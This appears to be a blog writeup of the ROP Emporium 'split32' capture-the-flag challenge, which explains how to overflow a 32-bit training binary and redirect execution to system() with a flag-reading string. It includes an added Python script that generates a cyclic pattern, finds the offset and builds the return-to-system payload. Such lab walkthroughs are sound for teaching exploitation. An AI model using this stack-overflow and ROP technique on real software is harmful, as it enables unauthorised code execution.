ROP Emporium Split32 (32 Bit) Writeup

Hariharan@Blog:~$
3 min read · Aug 18, 2021


This is the 2nd challenge in ROP Emporium. The challenge is pretty straightforward: we have to call the system() function with the string "/bin/cat flag.txt" to get our flag. So let's get started with the challenge.

First, I start by checking what kind of file the given binary is.

Next, I check the binary's memory protections with "checksec". NX is enabled and there is no PIE, which is why we reuse code that already sits at fixed addresses instead of injecting shellcode.

Now I had to check which functions the binary imports. I used rabin2 to get the details.

rabin2 -i "binary_name"

system() shows up among the imports, so it is called from somewhere inside the binary, and we need to find out where. "rabin2 -i" only lists imports, not the binary's own functions, so I used objdump instead: "objdump -D binary_name" disassembles everything. There was a usefulFunction() in the binary which contained the system() call. I disassembled this function in gdb.

I saw that something was pushed onto the stack right before the system() call. That push is system()'s argument, so I checked what it pointed to.

So the system() call just executes whatever string is pushed before it is called, which here is "/bin/ls". We need to replace this with "/bin/cat flag.txt". For this we first need to search for that string in GDB.

So we could use this string in place of "/bin/ls". But how do we do this? Rather than returning to system@plt itself, I return to the address of the "call system@plt" instruction inside usefulFunction(), which is 0x0804861a. When that call executes it pushes its own return address, so the very next word we place on the stack, the address of "/bin/cat flag.txt", lands exactly where system() expects its argument. (Returning straight to system@plt also works, but then a dummy return address has to sit between system@plt and the string address, because nothing pushes one for us.)

Now we find how many bytes it takes to fill the buffer, the padding, and the saved EBP before we reach the saved return address (EIP). To do this, I used "pattern create" in gdb-peda and fed the generated pattern to the binary while running it inside gdb-peda.

Here we can see that "AFAA" has been written into EIP. To turn that into an offset, we use "pattern offset".

So I need 44 bytes of filler to cover the buffer, padding, and EBP; the next four bytes overwrite EIP. Here is my final exploit.
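Since the final exploit is only shown as a screenshot, here is an added stand-alone Python version of the two steps above (it is not the post's own script, and it avoids pwntools so it runs anywhere). It uses the Metasploit-style "Aa0Aa1..." pattern rather than peda's alphabet, so the bytes at offset 44 read "4Ab5" instead of "AFAA", but the offset search is the same, and it also converts the integer gdb prints in EIP back to little-endian bytes before searching. The offset 44 and the call-site address 0x0804861a come from the writeup; the usefulString address is a placeholder assumption that you must replace with the one "find" returns for your copy of the binary.

```python
#!/usr/bin/env python3
# Added example: stand-alone split32 helper (not the original post's exploit).
# OFFSET and CALL_SYSTEM are from the writeup; USEFUL_STRING is a PLACEHOLDER
# (assumed for illustration) and must be replaced with the address gdb's `find`
# reports for "/bin/cat flag.txt" in your copy of the binary.
import struct
import sys

CALL_SYSTEM = 0x0804861A    # `call system@plt` inside usefulFunction (from the writeup)
USEFUL_STRING = 0x0804A030  # PLACEHOLDER for the "/bin/cat flag.txt" address (assumption)
OFFSET = 44                 # buffer + padding + saved EBP, as found with `pattern offset`


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style 'Aa0Aa1Aa2...' pattern: every 4-byte window is unique
    within the first 20280 bytes (26*26*10 groups of 3). peda's pattern, used in
    the writeup, has the same property with a different alphabet, which is why
    it showed 'AFAA' at offset 44 where this one shows '4Ab5'."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern: bytes, value, bits: int = 32) -> int:
    """Equivalent of peda's `pattern offset`. `value` is either the raw bytes that
    landed in EIP (b'4Ab5') or the integer gdb prints (0x35624134); the integer
    is the little-endian encoding of those bytes, so decode it before searching."""
    needle = value.to_bytes(bits // 8, "little") if isinstance(value, int) else bytes(value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError(f"{needle!r} does not occur in the pattern")
    if pattern.find(needle, idx + 1) != -1:
        raise ValueError(f"{needle!r} occurs more than once; use a longer needle")
    return idx


def build_payload(offset: int, ret_target: int, arg: int, filler: bytes = b"A") -> bytes:
    """Stack after the overflow, lowest address first:
         filler * offset   -> buffer, padding and saved EBP
         ret_target        -> overwrites the saved EIP
         arg               -> first argument of system()
    ret_target is the `call system@plt` instruction itself, so when it runs it
    pushes its own return address and system() finds `arg` at [esp+4]. If you
    return straight to system@plt instead, a dummy return word has to sit
    between system@plt and arg, because nothing pushes one for you."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return filler * offset + struct.pack("<I", ret_target) + struct.pack("<I", arg)


def split32_payload() -> bytes:
    """The writeup's chain: return into `call system@plt`, argument = usefulString."""
    return build_payload(OFFSET, CALL_SYSTEM, USEFUL_STRING)


if __name__ == "__main__":
    # Usage:  python3 split32.py pattern | ./split32   (crash, read EIP, get the offset)
    #         python3 split32.py | ./split32           (send the real payload)
    if len(sys.argv) > 1 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(cyclic_pattern(100))
    else:
        sys.stdout.buffer.write(split32_payload() + b"\n")
```

Run it with "pattern" first, note the value gdb shows in EIP, and pass that value (as an int or as bytes) to pattern_offset() to confirm 44 before sending the real payload.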

Executing this should give me the flag.

WE HAVE OUR FLAG!

Hope you understood the challenge. Do check out my other blogs.

Don’t forget to give some claps if you reached here :) Follow me for more writeups.

Goodbye:)
